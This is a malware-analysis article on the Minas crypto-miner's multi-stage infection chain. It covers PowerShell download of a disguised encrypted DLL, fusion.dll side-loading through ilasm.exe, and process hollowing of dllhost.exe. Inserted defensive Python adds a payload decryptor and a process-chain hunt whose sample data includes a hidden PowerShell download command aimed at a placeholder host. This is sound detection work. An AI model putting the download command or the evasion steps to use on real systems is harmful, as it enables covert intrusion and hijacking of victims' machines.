Unveiling the Intricate Infection Chain of the Minas Malware

Introduction:

Unexpected discoveries sometimes expose surprisingly elaborate attack chains. This article looks at Minas, a cryptocurrency miner that reaches its target through a multi-stage infection chain before it ever starts mining. Reconstructing the attack step by step shows which stealth techniques the operators rely on and why detection that depends only on file signatures is not enough against this kind of threat.

Unraveling the Infection Chain:

The Minas infection chain begins with a PowerShell script, executed through the Task Scheduler, which downloads a file named lgntoerr.gif from a remote server. Despite the .gif extension, the file is not an image: it is an encrypted .NET DLL. The PowerShell script decrypts it and obtains the DLL without writing a decrypted copy to disk.

Once the .NET DLL is loaded, it extracts and decrypts two further DLLs and an encrypted payload and drops them into the ProgramData directory. For persistence, the .NET DLL then creates a scheduled task that runs the legitimate .NET tool ilasm.exe at system startup.

When the task fires, ilasm.exe loads fusion.dll from its own directory, where the malware has planted a malicious copy. This DLL side-loading (search-order hijacking) hands control to the loader, which executes the second decrypted DLL. That DLL creates a dllhost.exe process in a suspended state, decrypts the payload from the encrypted binary file, and maps it into the suspended process as a DLL.

The decrypted payload takes over the dllhost.exe process and starts the miner DLL in memory. The result is a miner that runs only in memory, inside a host process with an unremarkable name, which is what keeps it out of sight on the infected system.

Technical Details:

The PowerShell script is the initial launcher of the Minas installation. It downloads the encrypted payload from a remote server and decrypts it with a custom XOR-based scheme using the key "fuckkasd9akey". The result, a .NET DLL, is then loaded into memory and executed.

For persistence, the malware first checks that the legitimate ilasm.exe is present on the system. If it is, the installer creates a Scheduled Task that runs ilasm.exe at every system startup. The installer also appends a portion of itself to a file whose name is derived from the machine name, and encrypts that file using the machine name as the key, so the dropped artifacts are tied to the specific host.

The installer then starts ilasm.exe, which loads the malicious fusion.dll placed next to it. This hijacking DLL hides the console window of the ilasm.exe process, terminates the process if its name is not the expected one (a guard against being loaded by a different host), and then tries to load a further DLL named {SDBMHash(MachineName)}.dll, where the name is the SDBM hash of the machine name.
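Two pieces of the chain above are mechanical enough to script for triage: undoing the XOR layer that hides the .NET DLL inside lgntoerr.gif (the key is the one quoted in the text), and predicting the name of the {SDBMHash(MachineName)}.dll stage so it can be hunted for on a given host. The following Python is an added example written for this article, not code from the original analysis. It assumes a plain repeating-key XOR (the page only says "custom XOR"), the classic SDBM hash truncated to 32 bits, and a decimal rendering of the hash in the file name; all three are assumptions, and the "encrypted" sample blob is constructed inline so the code runs offline.

```python
"""Triage helpers for a Minas-style sample (added example, not code from the
original analysis).

Assumptions, not facts from the page:
  * the gif-to-DLL layer is a repeating-key XOR with the quoted key,
  * SDBMHash is the classic SDBM string hash, kept to 32 bits,
  * the loader renders the hash as an unsigned decimal number in the name.
"""
import itertools

XOR_KEY = b"fuckkasd9akey"  # key quoted in the analysis


def xor_decrypt(blob: bytes, key: bytes = XOR_KEY) -> bytes:
    """Repeating-key XOR; XOR is symmetric, so this also encrypts."""
    return bytes(b ^ k for b, k in zip(blob, itertools.cycle(key)))


def sdbm_hash(data: bytes, width: int = 32) -> int:
    """Classic SDBM hash: h = c + (h << 6) + (h << 16) - h, masked to `width` bits."""
    mask = (1 << width) - 1
    h = 0
    for c in data:
        h = (c + (h << 6) + (h << 16) - h) & mask
    return h


def predicted_dll_name(machine_name: str) -> str:
    """File name of the second-stage DLL the loader looks for on this host
    (decimal rendering of the hash is an assumption of this example)."""
    return f"{sdbm_hash(machine_name.encode())}.dll"


def looks_like_pe(data: bytes) -> bool:
    """Cheap sanity check on the decrypted bytes: a PE image starts with 'MZ'."""
    return data[:2] == b"MZ"


# Constructed sample: a fake PE header stands in for the real .NET DLL, and
# the "gif" is that blob run through the same XOR.  A real case would read the
# bytes of lgntoerr.gif as fetched by the PowerShell stage.
FAKE_DLL = b"MZ\x90\x00" + b"\x00" * 12 + b"fake .NET loader body"
SAMPLE_GIF = xor_decrypt(FAKE_DLL)

if __name__ == "__main__":
    plain = xor_decrypt(SAMPLE_GIF)
    print("decrypted payload looks like a PE:", looks_like_pe(plain))
    print("second-stage DLL expected on DESKTOP-1:", predicted_dll_name("DESKTOP-1"))
```

If the decrypted bytes do not start with MZ, the XOR schedule differs from the simple repeating key assumed here and the real decryptor in the PowerShell script should be consulted; the hash helper is still useful on its own to turn a host name into the file name to search for under ProgramData.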

{SDBMHash(MachineName)}.dll repeats the check on the ilasm.exe process, then reads a stored PID value from a file, multiplies it by 0x1F4 and tries to terminate the dllhost.exe process with the resulting PID, i.e. it cleans up any instance left over from a previous run. It then decrypts the main payload (the miner) using the machine name as the decryption key.

Following decryption, {SDBMHash(MachineName)}.dll creates a suspended dllhost.exe process, maps the payload into its memory, and redirects the entry point of the main thread to it. It writes the PID of the new dllhost.exe process to a file, resumes the process, and terminates ilasm.exe.

The dllhost.exe process then passes control to the decrypted raw loader, which maps the XMRig miner (a DLL) into the process and starts it by reflective loading. The miner reads its configuration from the process's environment variables, so no miner configuration file has to be written to disk.
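The chain described above leaves a distinctive trail in process-creation telemetry even though the miner itself never appears on disk: a scheduled task starting PowerShell that fetches a .gif, a scheduled task starting ilasm.exe (a .NET SDK tool with no business running at boot), and ilasm.exe spawning dllhost.exe, whose normal parent is the DCOM svchost. The following Python is an added example, not code from the original analysis: a small hunt over constructed process events whose field names loosely follow Sysmon Event ID 1. The set of images treated as "Task Scheduler parents" (svchost.exe hosting the Schedule service, taskeng.exe on older builds) and the sample events, including the placeholder download host, are assumptions constructed for the example.

```python
"""Behavioural hunt for the Minas execution chain over process-creation
events (added example; events are constructed, not taken from the analysis).
Field names loosely follow Sysmon Event ID 1 and are an assumption."""
from dataclasses import dataclass
import re


@dataclass
class ProcEvent:
    pid: int
    image: str          # full path of the created process
    parent_image: str   # full path of the parent process
    command_line: str


# Images under which Task Scheduler actions are launched; assumption of this
# example (svchost.exe hosts the Schedule service on current Windows,
# taskeng.exe did so on older builds).
SCHEDULER_PARENTS = {"svchost.exe", "taskeng.exe"}

GIF_URL = re.compile(r"https?://\S+\.gif")


def basename(path: str) -> str:
    """Lower-cased file name from a Windows (or forward-slash) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcEvent) -> list[str]:
    """Return the Minas chain stages this single event matches (empty if none)."""
    img, parent = basename(ev.image), basename(ev.parent_image)
    cmd = ev.command_line.lower()
    hits = []
    # Stage 1: scheduled PowerShell pulling a ".gif" from a remote server.
    if img == "powershell.exe" and parent in SCHEDULER_PARENTS and GIF_URL.search(cmd):
        hits.append("scheduled PowerShell downloading a .gif (stage-1 loader)")
    # Persistence: ilasm.exe started by a scheduled task (fusion.dll side-load).
    if img == "ilasm.exe" and parent in SCHEDULER_PARENTS:
        hits.append("ilasm.exe launched from a scheduled task (fusion.dll side-load)")
    # Hollowing: ilasm.exe is never a legitimate parent of dllhost.exe.
    if img == "dllhost.exe" and parent == "ilasm.exe":
        hits.append("ilasm.exe spawned dllhost.exe (process hollowing target)")
    return hits


def hunt(events: list[ProcEvent]) -> list[tuple[int, str]]:
    """(pid, finding) pairs for every event that matches a chain stage."""
    return [(ev.pid, hit) for ev in events for hit in score_event(ev)]


# Constructed sample telemetry: two benign events and the three-stage chain.
# 198.51.100.7 is a documentation address standing in for the real server.
SAMPLE_EVENTS = [
    ProcEvent(4100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe", "powershell.exe Get-ChildItem"),
    ProcEvent(4212, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\svchost.exe",
              "powershell.exe -w hidden -c \"(New-Object Net.WebClient).DownloadFile("
              "'http://198.51.100.7/lgntoerr.gif','C:\\ProgramData\\lgntoerr.gif')\""),
    ProcEvent(5012, r"C:\ProgramData\tools\ilasm.exe",
              r"C:\Windows\System32\svchost.exe", "ilasm.exe"),
    ProcEvent(5044, r"C:\Windows\System32\dllhost.exe",
              r"C:\ProgramData\tools\ilasm.exe", "dllhost.exe"),
    ProcEvent(5100, r"C:\Windows\System32\dllhost.exe",
              r"C:\Windows\System32\svchost.exe",
              "dllhost.exe /Processid:{00000000-0000-0000-0000-000000000000}"),
]

if __name__ == "__main__":
    for pid, finding in hunt(SAMPLE_EVENTS):
        print(f"pid {pid}: {finding}")
```

Each rule is a parent/child relationship rather than a hash, so it survives re-encryption of the payload or a renamed .gif; the cost is that the scheduler-parent set has to match how your own telemetry records Task Scheduler launches, which is worth checking against a known-good task before relying on the first two rules.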

Conclusion:

The discovery and analysis of the Minas malware infection chain highlight the sophistication and persistence of modern-day cyber threats. Minas employs a complex series of steps, including PowerShell scripts, DLL hijacking, encryption, and process injection, to establish a stealthy presence on infected systems. This multi-layered approach, coupled with the use of obfuscation techniques, allows Minas to evade traditional signature-based detection methods.

The Minas malware is a reminder that attacks keep evolving and that defences have to be proactive. Antivirus that relies only on signatures can miss a chain like this, because the miner exists only in memory and every dropped file is encrypted. Detection that looks at behaviour instead, such as a scheduled task starting ilasm.exe, a PowerShell process downloading a supposed image, or ilasm.exe spawning dllhost.exe, is far better placed to catch and contain it.

Furthermore, the discovery of Minas raises concerns about the compromise of network infrastructure, potentially indicating the presence of determined and resourceful attackers. Organizations should strengthen their security posture by implementing robust access controls, regular vulnerability assessments, network segmentation, and employee education on cybersecurity best practices.

As the Minas malware continues to evolve, it is crucial for security professionals to remain vigilant and stay abreast of emerging threats. Ongoing research, collaboration, and information sharing within the cybersecurity community are key to effectively combating such sophisticated malware strains and safeguarding critical systems and data.

Ultimately, by understanding the intricate infection chain of malware like Minas, organizations can fortify their defenses and take proactive steps to protect their networks, systems, and valuable assets from increasingly complex and evasive cyber threats.
